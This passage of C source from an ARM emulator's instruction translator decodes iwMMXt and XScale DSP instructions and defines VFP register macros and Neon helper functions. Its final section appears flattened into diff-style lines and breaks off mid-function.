        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x113: case 0x513: case 0x913: case 0xd13:	/* TANDC */
        if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3)
            return 1;
        /* AND together all per-element flag nibbles of wCASF. */
        tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF);
        tmp2 = tcg_temp_new_i32(tcg_ctx);
        tcg_gen_mov_i32(tcg_ctx, tmp2, tmp);
        switch ((insn >> 22) & 3) {
        case 0:
            for (i = 0; i < 7; i ++) {
                tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4);
                tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2);
            }
            break;
        case 1:
            for (i = 0; i < 3; i ++) {
                tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8);
                tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2);
            }
            break;
        case 2:
            tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16);
            tcg_gen_and_i32(tcg_ctx, tmp, tmp, tmp2);
            break;
        }
        gen_set_nzcv(s, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_temp_free_i32(tcg_ctx, tmp);
        break;
    case 0x01c: case 0x41c: case 0x81c: case 0xc1c:	/* WACC */
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            gen_helper_iwmmxt_addcb(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0);
            break;
        case 1:
            gen_helper_iwmmxt_addcw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0);
            break;
        case 2:
            gen_helper_iwmmxt_addcl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x115: case 0x515: case 0x915: case 0xd15:	/* TORC */
        if ((insn & 0x000ff00f) != 0x0003f000 || ((insn >> 22) & 3) == 3)
            return 1;
        /* OR together all per-element flag nibbles of wCASF. */
        tmp = iwmmxt_load_creg(s, ARM_IWMMXT_wCASF);
        tmp2 = tcg_temp_new_i32(tcg_ctx);
        tcg_gen_mov_i32(tcg_ctx, tmp2, tmp);
        switch ((insn >> 22) & 3) {
        case 0:
            for (i = 0; i < 7; i ++) {
                tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 4);
                tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2);
            }
            break;
        case 1:
            for (i = 0; i < 3; i ++) {
                tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 8);
                tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2);
            }
            break;
        case 2:
            tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16);
            tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2);
            break;
        }
        gen_set_nzcv(s, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_temp_free_i32(tcg_ctx, tmp);
        break;
    case 0x103: case 0x503: case 0x903: case 0xd03:	/* TMOVMSK */
        rd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        if ((insn & 0xf) != 0 || ((insn >> 22) & 3) == 3)
            return 1;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        tmp = tcg_temp_new_i32(tcg_ctx);
        switch ((insn >> 22) & 3) {
        case 0:
            gen_helper_iwmmxt_msbb(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            break;
        case 1:
            gen_helper_iwmmxt_msbw(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            break;
        case 2:
            gen_helper_iwmmxt_msbl(tcg_ctx, tmp, tcg_ctx->cpu_M0);
            break;
        }
        store_reg(s, rd, tmp);
        break;
    case 0x106: case 0x306: case 0x506: case 0x706:	/* WCMPGT */
    case 0x906: case 0xb06: case 0xd06: case 0xf06:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            if (insn & (1 << 21))
                gen_op_iwmmxt_cmpgtsb_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_cmpgtub_M0_wRn(s, rd1);
            break;
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_cmpgtsw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_cmpgtuw_M0_wRn(s, rd1);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_cmpgtsl_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_cmpgtul_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x00e: case 0x20e: case 0x40e: case 0x60e:	/* WUNPCKEL */
    case 0x80e: case 0xa0e: case 0xc0e: case 0xe0e:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpacklsb_M0(s);
            else
                gen_op_iwmmxt_unpacklub_M0(s);
            break;
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpacklsw_M0(s);
            else
                gen_op_iwmmxt_unpackluw_M0(s);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpacklsl_M0(s);
            else
                gen_op_iwmmxt_unpacklul_M0(s);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x00c: case 0x20c: case 0x40c: case 0x60c:	/* WUNPCKEH */
    case 0x80c: case 0xa0c: case 0xc0c: case 0xe0c:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpackhsb_M0(s);
            else
                gen_op_iwmmxt_unpackhub_M0(s);
            break;
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpackhsw_M0(s);
            else
                gen_op_iwmmxt_unpackhuw_M0(s);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_unpackhsl_M0(s);
            else
                gen_op_iwmmxt_unpackhul_M0(s);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x204: case 0x604: case 0xa04: case 0xe04:	/* WSRL */
    case 0x214: case 0x614: case 0xa14: case 0xe14:
        if (((insn >> 22) & 3) == 0)
            return 1;
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        tmp = tcg_temp_new_i32(tcg_ctx);
        if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) {
            tcg_temp_free_i32(tcg_ctx, tmp);
            return 1;
        }
        switch ((insn >> 22) & 3) {
        case 1:
            gen_helper_iwmmxt_srlw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 2:
            gen_helper_iwmmxt_srll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 3:
            gen_helper_iwmmxt_srlq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        }
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x004: case 0x404: case 0x804: case 0xc04:	/* WSRA */
    case 0x014: case 0x414: case 0x814: case 0xc14:
        if (((insn >> 22) & 3) == 0)
            return 1;
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        tmp = tcg_temp_new_i32(tcg_ctx);
        if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) {
            tcg_temp_free_i32(tcg_ctx, tmp);
            return 1;
        }
        switch ((insn >> 22) & 3) {
        case 1:
            gen_helper_iwmmxt_sraw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 2:
            gen_helper_iwmmxt_sral(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 3:
            gen_helper_iwmmxt_sraq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        }
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x104: case 0x504: case 0x904: case 0xd04:	/* WSLL */
    case 0x114: case 0x514: case 0x914: case 0xd14:
        if (((insn >> 22) & 3) == 0)
            return 1;
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        tmp = tcg_temp_new_i32(tcg_ctx);
        if (gen_iwmmxt_shift(s, insn, 0xff, tmp)) {
            tcg_temp_free_i32(tcg_ctx, tmp);
            return 1;
        }
        switch ((insn >> 22) & 3) {
        case 1:
            gen_helper_iwmmxt_sllw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 2:
            gen_helper_iwmmxt_slll(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 3:
            gen_helper_iwmmxt_sllq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        }
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x304: case 0x704: case 0xb04: case 0xf04:	/* WROR */
    case 0x314: case 0x714: case 0xb14: case 0xf14:
        if (((insn >> 22) & 3) == 0)
            return 1;
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        tmp = tcg_temp_new_i32(tcg_ctx);
        /* Rotate count mask depends on element size. */
        switch ((insn >> 22) & 3) {
        case 1:
            if (gen_iwmmxt_shift(s, insn, 0xf, tmp)) {
                tcg_temp_free_i32(tcg_ctx, tmp);
                return 1;
            }
            gen_helper_iwmmxt_rorw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 2:
            if (gen_iwmmxt_shift(s, insn, 0x1f, tmp)) {
                tcg_temp_free_i32(tcg_ctx, tmp);
                return 1;
            }
            gen_helper_iwmmxt_rorl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        case 3:
            if (gen_iwmmxt_shift(s, insn, 0x3f, tmp)) {
                tcg_temp_free_i32(tcg_ctx, tmp);
                return 1;
            }
            gen_helper_iwmmxt_rorq(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
            break;
        }
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x116: case 0x316: case 0x516: case 0x716:	/* WMIN */
    case 0x916: case 0xb16: case 0xd16: case 0xf16:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            if (insn & (1 << 21))
                gen_op_iwmmxt_minsb_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_minub_M0_wRn(s, rd1);
            break;
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_minsw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_minuw_M0_wRn(s, rd1);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_minsl_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_minul_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x016: case 0x216: case 0x416: case 0x616:	/* WMAX */
    case 0x816: case 0xa16: case 0xc16: case 0xe16:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 0:
            if (insn & (1 << 21))
                gen_op_iwmmxt_maxsb_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_maxub_M0_wRn(s, rd1);
            break;
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_maxsw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_maxuw_M0_wRn(s, rd1);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_maxsl_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_maxul_M0_wRn(s, rd1);
            break;
        case 3:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x002: case 0x102: case 0x202: case 0x302:	/* WALIGNI */
    case 0x402: case 0x502: case 0x602: case 0x702:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* Immediate alignment amount (0..3) from insn bits [21:20]. */
        tmp = tcg_const_i32(tcg_ctx, (insn >> 20) & 3);
        iwmmxt_load_reg(s, tcg_ctx->cpu_V1, rd1);
        gen_helper_iwmmxt_align(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tcg_ctx->cpu_V1, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    case 0x01a: case 0x11a: case 0x21a: case 0x31a:	/* WSUB */
    case 0x41a: case 0x51a: case 0x61a: case 0x71a:
    case 0x81a: case 0x91a: case 0xa1a: case 0xb1a:
    case 0xc1a: case 0xd1a: case 0xe1a: case 0xf1a:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* insn[23:22] = element size, insn[21:20] = saturation mode. */
        switch ((insn >> 20) & 0xf) {
        case 0x0:
            gen_op_iwmmxt_subnb_M0_wRn(s, rd1);
            break;
        case 0x1:
            gen_op_iwmmxt_subub_M0_wRn(s, rd1);
            break;
        case 0x3:
            gen_op_iwmmxt_subsb_M0_wRn(s, rd1);
            break;
        case 0x4:
            gen_op_iwmmxt_subnw_M0_wRn(s, rd1);
            break;
        case 0x5:
            gen_op_iwmmxt_subuw_M0_wRn(s, rd1);
            break;
        case 0x7:
            gen_op_iwmmxt_subsw_M0_wRn(s, rd1);
            break;
        case 0x8:
            gen_op_iwmmxt_subnl_M0_wRn(s, rd1);
            break;
        case 0x9:
            gen_op_iwmmxt_subul_M0_wRn(s, rd1);
            break;
        case 0xb:
            gen_op_iwmmxt_subsl_M0_wRn(s, rd1);
            break;
        default:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x01e: case 0x11e: case 0x21e: case 0x31e:	/* WSHUFH */
    case 0x41e: case 0x51e: case 0x61e: case 0x71e:
    case 0x81e: case 0x91e: case 0xa1e: case 0xb1e:
    case 0xc1e: case 0xd1e: case 0xe1e: case 0xf1e:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* 8-bit shuffle selector split across insn[19:16] and insn[3:0]. */
        tmp = tcg_const_i32(tcg_ctx, ((insn >> 16) & 0xf0) | (insn & 0x0f));
        gen_helper_iwmmxt_shufh(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_env, tcg_ctx->cpu_M0, tmp);
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x018: case 0x118: case 0x218: case 0x318:	/* WADD */
    case 0x418: case 0x518: case 0x618: case 0x718:
    case 0x818: case 0x918: case 0xa18: case 0xb18:
    case 0xc18: case 0xd18: case 0xe18: case 0xf18:
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        /* Same size/saturation encoding as WSUB above. */
        switch ((insn >> 20) & 0xf) {
        case 0x0:
            gen_op_iwmmxt_addnb_M0_wRn(s, rd1);
            break;
        case 0x1:
            gen_op_iwmmxt_addub_M0_wRn(s, rd1);
            break;
        case 0x3:
            gen_op_iwmmxt_addsb_M0_wRn(s, rd1);
            break;
        case 0x4:
            gen_op_iwmmxt_addnw_M0_wRn(s, rd1);
            break;
        case 0x5:
            gen_op_iwmmxt_adduw_M0_wRn(s, rd1);
            break;
        case 0x7:
            gen_op_iwmmxt_addsw_M0_wRn(s, rd1);
            break;
        case 0x8:
            gen_op_iwmmxt_addnl_M0_wRn(s, rd1);
            break;
        case 0x9:
            gen_op_iwmmxt_addul_M0_wRn(s, rd1);
            break;
        case 0xb:
            gen_op_iwmmxt_addsl_M0_wRn(s, rd1);
            break;
        default:
            return 1;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x008: case 0x108: case 0x208: case 0x308:	/* WPACK */
    case 0x408: case 0x508: case 0x608: case 0x708:
    case 0x808: case 0x908: case 0xa08: case 0xb08:
    case 0xc08: case 0xd08: case 0xe08: case 0xf08:
        if (!(insn & (1 << 20)) || ((insn >> 22) & 3) == 0)
            return 1;
        wrd = (insn >> 12) & 0xf;
        rd0 = (insn >> 16) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        gen_op_iwmmxt_movq_M0_wRn(s, rd0);
        switch ((insn >> 22) & 3) {
        case 1:
            if (insn & (1 << 21))
                gen_op_iwmmxt_packsw_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_packuw_M0_wRn(s, rd1);
            break;
        case 2:
            if (insn & (1 << 21))
                gen_op_iwmmxt_packsl_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_packul_M0_wRn(s, rd1);
            break;
        case 3:
            if (insn & (1 << 21))
                gen_op_iwmmxt_packsq_M0_wRn(s, rd1);
            else
                gen_op_iwmmxt_packuq_M0_wRn(s, rd1);
            break;
        }
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        gen_op_iwmmxt_set_cup(s);
        break;
    case 0x201: case 0x203: case 0x205: case 0x207:	/* TMIA / TMIAPH / TMIAxy */
    case 0x209: case 0x20b: case 0x20d: case 0x20f:
    case 0x211: case 0x213: case 0x215: case 0x217:
    case 0x219: case 0x21b: case 0x21d: case 0x21f:
        wrd = (insn >> 5) & 0xf;
        rd0 = (insn >> 12) & 0xf;
        rd1 = (insn >> 0) & 0xf;
        if (rd0 == 0xf || rd1 == 0xf)
            return 1;
        gen_op_iwmmxt_movq_M0_wRn(s, wrd);
        tmp = load_reg(s, rd0);
        tmp2 = load_reg(s, rd1);
        switch ((insn >> 16) & 0xf) {
        case 0x0:					/* TMIA */
            gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        case 0x8:					/* TMIAPH */
            gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        case 0xc: case 0xd: case 0xe: case 0xf:		/* TMIAxy */
            /* x/y select top/bottom halfword of each operand. */
            if (insn & (1 << 16))
                tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16);
            if (insn & (1 << 17))
                tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16);
            gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        default:
            tcg_temp_free_i32(tcg_ctx, tmp2);
            tcg_temp_free_i32(tcg_ctx, tmp);
            return 1;
        }
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_temp_free_i32(tcg_ctx, tmp);
        gen_op_iwmmxt_movq_wRn_M0(s, wrd);
        gen_op_iwmmxt_set_mup(s);
        break;
    default:
        return 1;
    }

    return 0;
}

/* Disassemble an XScale DSP instruction.  Returns nonzero if an error occurred
   (i.e. an undefined instruction).
*/
static int disas_dsp_insn(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int acc, rd0, rd1, rdhi, rdlo;
    TCGv_i32 tmp, tmp2;

    if ((insn & 0x0ff00f10) == 0x0e200010) {
        /* Multiply with Internal Accumulate Format */
        rd0 = (insn >> 12) & 0xf;
        rd1 = insn & 0xf;
        acc = (insn >> 5) & 7;

        /* Only accumulator 0 exists on XScale. */
        if (acc != 0)
            return 1;

        tmp = load_reg(s, rd0);
        tmp2 = load_reg(s, rd1);
        switch ((insn >> 16) & 0xf) {
        case 0x0:					/* MIA */
            gen_helper_iwmmxt_muladdsl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        case 0x8:					/* MIAPH */
            gen_helper_iwmmxt_muladdsw(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        case 0xc:					/* MIABB */
        case 0xd:					/* MIABT */
        case 0xe:					/* MIATB */
        case 0xf:					/* MIATT */
            /* B/T flags select bottom/top halfword of each operand. */
            if (insn & (1 << 16))
                tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16);
            if (insn & (1 << 17))
                tcg_gen_shri_i32(tcg_ctx, tmp2, tmp2, 16);
            gen_helper_iwmmxt_muladdswl(tcg_ctx, tcg_ctx->cpu_M0, tcg_ctx->cpu_M0, tmp, tmp2);
            break;
        default:
            return 1;
        }
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_temp_free_i32(tcg_ctx, tmp);

        gen_op_iwmmxt_movq_wRn_M0(s, acc);
        return 0;
    }

    if ((insn & 0x0fe00ff8) == 0x0c400000) {
        /* Internal Accumulator Access Format */
        rdhi = (insn >> 16) & 0xf;
        rdlo = (insn >> 12) & 0xf;
        acc = insn & 7;

        if (acc != 0)
            return 1;

        if (insn & ARM_CP_RW_BIT) {			/* MRA */
            iwmmxt_load_reg(s, tcg_ctx->cpu_V0, acc);
            tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_V0);
            tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_V0, 32);
            tcg_gen_trunc_i64_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_V0);
            /* The accumulator is only 40 bits wide; mask the high word. */
            tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_R[rdhi], tcg_ctx->cpu_R[rdhi], (1 << (40 - 32)) - 1);
        } else {					/* MAR */
            tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_R[rdlo], tcg_ctx->cpu_R[rdhi]);
            iwmmxt_store_reg(s, tcg_ctx->cpu_V0, acc);
        }
        return 0;
    }

    return 1;
}

// this causes "warning C4293: shift count negative or too big, undefined behavior"
// on msvc, so is replaced with separate versions for the shift to perform.
//#define VFP_REG_SHR(x, n) (((n) > 0) ? (x) >> (n) : (x) << -(n))
#if 0
#define VFP_SREG(insn, bigbit, smallbit) \
  ((VFP_REG_SHR(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1))
#endif

/* Left-shift variant, used when bigbit - 1 is negative (M registers). */
#define VFP_REG_SHR_NEG(insn, n) ((insn) << -(n))
#define VFP_SREG_NEG(insn, bigbit, smallbit) \
  ((VFP_REG_SHR_NEG(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1))

/* NOTE(review): shifts 'insn', not the 'x' parameter — all call sites pass
   insn so behavior is unchanged, but the unused parameter is misleading. */
#define VFP_REG_SHR_POS(x, n) ((insn) >> (n))
#define VFP_SREG_POS(insn, bigbit, smallbit) \
  ((VFP_REG_SHR_POS(insn, bigbit - 1) & 0x1e) | (((insn) >> (smallbit)) & 1))

/* Extract a double-precision register number; VFP3 adds the high bit
   from 'smallbit', pre-VFP3 it must be zero. */
#define VFP_DREG(reg, insn, bigbit, smallbit) do { \
    if (arm_dc_feature(s, ARM_FEATURE_VFP3)) { \
        reg = (((insn) >> (bigbit)) & 0x0f) \
              | (((insn) >> ((smallbit) - 4)) & 0x10); \
    } else { \
        if (insn & (1 << (smallbit))) \
            return 1; \
        reg = ((insn) >> (bigbit)) & 0x0f; \
    }} while (0)

#define VFP_SREG_D(insn) VFP_SREG_POS(insn, 12, 22)
#define VFP_DREG_D(reg, insn) VFP_DREG(reg, insn, 12, 22)
#define VFP_SREG_N(insn) VFP_SREG_POS(insn, 16, 7)
#define VFP_DREG_N(reg, insn) VFP_DREG(reg, insn, 16, 7)
#define VFP_SREG_M(insn) VFP_SREG_NEG(insn, 0, 5)
#define VFP_DREG_M(reg, insn) VFP_DREG(reg, insn, 0, 5)

/* Move between integer and VFP cores.
*/ +static TCGv_i32 gen_vfp_mrs(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp, tcg_ctx->cpu_F0s); + return tmp; +} + +static void gen_vfp_msr(DisasContext *s, TCGv_i32 tmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_F0s, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_u8(DisasContext *s, TCGv_i32 var, int shift) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + if (shift) + tcg_gen_shri_i32(tcg_ctx, var, var, shift); + tcg_gen_ext8u_i32(tcg_ctx, var, var); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 8); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_low16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ext16u_i32(tcg_ctx, var, var); + tcg_gen_shli_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static void gen_neon_dup_high16(DisasContext *s, TCGv_i32 var) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, var, var, 0xffff0000); + tcg_gen_shri_i32(tcg_ctx, tmp, var, 16); + tcg_gen_or_i32(tcg_ctx, var, var, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); +} + +static TCGv_i32 gen_load_and_replicate(DisasContext *s, TCGv_i32 addr, int size) +{ + /* Load a single Neon element and replicate into a 32 bit TCG reg */ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); + switch (size) { + case 0: + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + gen_neon_dup_u8(s, tmp, 0); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + gen_neon_dup_low16(s, tmp); + break; + case 2: + gen_aa32_ld32u(s, tmp, 
